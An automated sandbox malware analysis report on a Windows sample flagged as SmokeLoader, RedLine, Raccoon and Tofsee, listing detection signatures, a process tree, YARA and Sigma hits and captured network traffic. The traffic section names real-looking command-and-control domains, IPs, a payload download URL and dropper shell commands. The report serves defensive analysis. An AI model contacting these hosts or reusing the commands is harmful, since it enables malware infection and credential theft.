
Windows Analysis Report pAWNholT8X.exe

Overview

General Information

Sample Name:pAWNholT8X.exe
Analysis ID:491658
MD5:fb45ecbfb0e13b103b6b1c583479a21d
SHA1:9cb9eead55f3b3f4847fd8f1bdd8d20ca46d9dc2
SHA256:d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6
Tags:CoinMinerexe

Detection

Raccoon RedLine SmokeLoader Tofsee
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (window names)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
PE file contains section with special chars
Hides threads from debuggers
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Machine Learning detection for dropped file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Yara detected Credential Stealer
Contains functionality to call native functions
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Social media urls found in memory data
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • pAWNholT8X.exe (PID: 6436 cmdline: 'C:\Users\user\Desktop\pAWNholT8X.exe' MD5: FB45ECBFB0E13B103B6B1C583479A21D)
    • pAWNholT8X.exe (PID: 1068 cmdline: 'C:\Users\user\Desktop\pAWNholT8X.exe' MD5: FB45ECBFB0E13B103B6B1C583479A21D)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 6CB1.exe (PID: 3168 cmdline: C:\Users\user\AppData\Local\Temp\6CB1.exe MD5: 2616D3A90B92A23F31A0BA2508076DFC)
          • 6CB1.exe (PID: 6176 cmdline: C:\Users\user\AppData\Local\Temp\6CB1.exe MD5: 2616D3A90B92A23F31A0BA2508076DFC)
        • 757C.exe (PID: 5560 cmdline: C:\Users\user\AppData\Local\Temp\757C.exe MD5: 287976D8C62519CBB494CF31916CE26E)
          • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • 757C.exe (PID: 6664 cmdline: C:\Users\user\AppData\Local\Temp\757C.exe MD5: 287976D8C62519CBB494CF31916CE26E)
        • 8433.exe (PID: 1292 cmdline: C:\Users\user\AppData\Local\Temp\8433.exe MD5: F853FE6B26DCF67545675AEC618F3A99)
          • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • CEB6.exe (PID: 3504 cmdline: C:\Users\user\AppData\Local\Temp\CEB6.exe MD5: 8E50D7FBCC07F331637ABBAA2C6ED428)
          • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • E52D.exe (PID: 6840 cmdline: C:\Users\user\AppData\Local\Temp\E52D.exe MD5: D0F8625E7557AE3CCC13440F3843515F)
        • FE25.exe (PID: 6296 cmdline: C:\Users\user\AppData\Local\Temp\FE25.exe MD5: CDDB8954B4839E0106963B050ED664EB)
        • 247A.exe (PID: 5332 cmdline: C:\Users\user\AppData\Local\Temp\247A.exe MD5: A8F923639F9B10392A12E409A4B65D80)
          • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • E52D.exe (PID: 6424 cmdline: 'C:\Users\user\AppData\Local\Temp\E52D.exe' MD5: D0F8625E7557AE3CCC13440F3843515F)
        • 3DEF.exe (PID: 6164 cmdline: C:\Users\user\AppData\Local\Temp\3DEF.exe MD5: F5339FAB992D8D5DC0E4106FB8B5B899)
          • cmd.exe (PID: 4416 cmdline: 'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\gelvdtot\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 2916 cmdline: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\dkwjsfga.exe' C:\Windows\SysWOW64\gelvdtot\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • E52D.exe (PID: 4760 cmdline: 'C:\Users\user\AppData\Local\Temp\E52D.exe' MD5: D0F8625E7557AE3CCC13440F3843515F)
  • svchost.exe (PID: 6672 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5768 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6856 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7044 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • ecrjwib (PID: 852 cmdline: C:\Users\user\AppData\Roaming\ecrjwib MD5: FB45ECBFB0E13B103B6B1C583479A21D)
    • ecrjwib (PID: 6780 cmdline: C:\Users\user\AppData\Roaming\ecrjwib MD5: FB45ECBFB0E13B103B6B1C583479A21D)
  • svchost.exe (PID: 5440 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000016.00000002.620551936.0000000000402000.00000040.00000001.sdmp, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Author: Florian Roth, Strings: 0xd33f8:$: VFZxUUFBT
Source: 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
Source: 00000023.00000002.626408703.0000000000400000.00000040.00020000.sdmp, Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Author: Joe Security
Source: 00000013.00000002.620846054.0000000000303000.00000040.00020000.sdmp, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
(13 further entries not shown)

Unpacked PEs

Source: 20.1.6CB1.exe.400000.0.unpack, Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Author: Joe Security
Source: 4.1.pAWNholT8X.exe.400000.0.unpack, Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Author: Joe Security
Source: 20.2.6CB1.exe.400000.0.unpack, Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Author: Joe Security
Source: 4.2.pAWNholT8X.exe.400000.0.unpack, Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Author: Joe Security
Source: 22.2.757C.exe.400000.0.unpack, Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Author: Joe Security
(3 further entries not shown)

Sigma Overview

System Summary:

Sigma detected: Copying Sensitive Files with Credential Data
Source: Process started, Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Data: Command: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\dkwjsfga.exe' C:\Windows\SysWOW64\gelvdtot\, CommandLine: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\dkwjsfga.exe' C:\Windows\SysWOW64\gelvdtot\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\3DEF.exe, ParentImage: C:\Users\user\AppData\Local\Temp\3DEF.exe, ParentProcessId: 6164, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\dkwjsfga.exe' C:\Windows\SysWOW64\gelvdtot\, ProcessId: 2916

Jbx Signature Overview

AV Detection:

Yara detected Raccoon Stealer
Source: Yara match, File source: 0000001E.00000002.653738313.000000000114D000.00000002.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://geenaldencia9.top/, Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\757C.exe, Avira: detection malicious, Label: HEUR/AGEN.1106254
Multi AV Scanner detection for submitted file
Source: pAWNholT8X.exe, Virustotal: Detection: 36%
Source: pAWNholT8X.exe, ReversingLabs: Detection: 40%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\CEB6.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\757C.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FE25.exe, Joe Sandbox ML: detected
Source: pAWNholT8X.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: unknown, HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49837 version: TLS 1.2
Source: Binary string: Z:\Development\Secureuser\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 8433.exe
Source: Binary string: #fNC:\neziyotugi voyosededidi.pdb source: 6CB1.exe, 00000010.00000000.473271527.0000000000412000.00000002.00020000.sdmp
Source: Binary string: C:\neziyotugi voyosededidi.pdb source: 6CB1.exe, 00000010.00000000.473271527.0000000000412000.00000002.00020000.sdmp
Source: Binary string: C:\hebesolazo\fanelugiken.pdb source: pAWNholT8X.exe, 00000000.00000002.364281095.0000000000412000.00000002.00020000.sdmp, ecrjwib, 0000000F.00000000.461024163.0000000000412000.00000002.00020000.sdmp
Source: Binary string: )/C:\hebesolazo\fanelugiken.pdb source: pAWNholT8X.exe, 00000000.00000002.364281095.0000000000412000.00000002.00020000.sdmp, ecrjwib, 0000000F.00000000.461024163.0000000000412000.00000002.00020000.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.6:49843 -> 194.180.174.100:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: nityanneron5.top
Source: C:\Windows\explorer.exe, Domain query: lynettaram7.top
Source: C:\Windows\explorer.exe, Domain query: umayaniela6.top
Source: C:\Windows\explorer.exe, Domain query: jebeccallis4.top
Source: C:\Windows\explorer.exe, Domain query: privacy-toolz-for-you-403.top
Source: C:\Windows\explorer.exe, Network Connect: 216.128.137.31 80
Source: C:\Windows\explorer.exe, Domain query: sadineyalas8.top
Source: C:\Windows\explorer.exe, Domain query: naghenrietti1.top
Source: C:\Windows\explorer.exe, Domain query: geenaldencia9.top
Source: C:\Windows\explorer.exe, Domain query: kimballiett2.top
Source: C:\Windows\explorer.exe, Domain query: xadriettany3.top
Uses known network protocols on non-standard ports
Source: unknown, Network traffic detected: HTTP traffic on port 49841 -> 9080
Source: unknown, Network traffic detected: HTTP traffic on port 9080 -> 49841
Source: global traffic, HTTP traffic detected: GET /hcdrom1 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Host: t.me
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Content-Length: 132 | Host: 194.180.174.100
Source: global traffic, HTTP traffic detected: GET //l/f/1pHWJnwB3dP17SpzF3sp/6cbf9ba43fa4774c97b7a910fd83e29808663306 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 194.180.174.100
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK | Date: Mon, 27 Sep 2021 17:34:20 GMT | Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38 | Last-Modified: Mon, 27 Sep 2021 17:34:02 GMT | ETag: "20000-5ccfd80bdc4c3" | Accept-Ranges: bytes | Content-Length: 131072 | Connection: close | Content-Type: application/octet-stream | Data Raw: [hex dump of the binary response body omitted]
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Mon, 27 Sep 2021 17:35:21 GMT | Content-Type: application/octet-stream | Content-Length: 916735 | Connection: keep-alive | Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT | ETag: "612fa893-dfcff" | Accept-Ranges: bytes | Data Raw: [hex dump of the binary response body omitted]
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-toolz-for-you-403.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: geenaldencia9.top
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://geenaldencia9.top/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 316 | Host: geenaldencia9.top
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://geenaldencia9.top/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 166 | Host: geenaldencia9.top
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://geenaldencia9.top/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 161 | Host: geenaldencia9.top
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://geenaldencia9.top/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 150 | Host: geenaldencia9.top
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://geenaldencia9.top/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 319 | Host: geenaldencia9.top
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://geenaldencia9.top/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 231 | Host: geenaldencia9.top
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://geenaldencia9.top/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 310 | Host: geenaldencia9.top
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://geenaldencia9.top/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 153 | Host: geenaldencia9.top
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://geenaldencia9.top/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 198 | Host: geenaldencia9.top
                    Source: global traffic | HTTP traffic detected: GET /a.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 193.56.146.41:9080
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://geenaldencia9.top/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 304 | Host: geenaldencia9.top
                    Source: global traffic | TCP traffic: 192.168.2.6:49841 -> 193.56.146.41:9080
                    Source: 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 27 Sep 2021 17:34:18 GMT | Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38 | X-Powered-By: PHP/5.5.38 | Content-Length: 25 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Raw: 14 00 00 00 7b fa f1 1f b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 | Data Ascii: {i+,GO
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp | String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                    Source: svchost.exe, 0000000D.00000002.505111408.000001D408B00000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: svchost.exe, 0000000D.00000002.503887822.000001D4082EB000.00000004.00000001.sdmp | String found in binary or memory: http://crl.ver)
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/AckRequested
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CloseSequence
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CloseSequenceResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CreateSequence
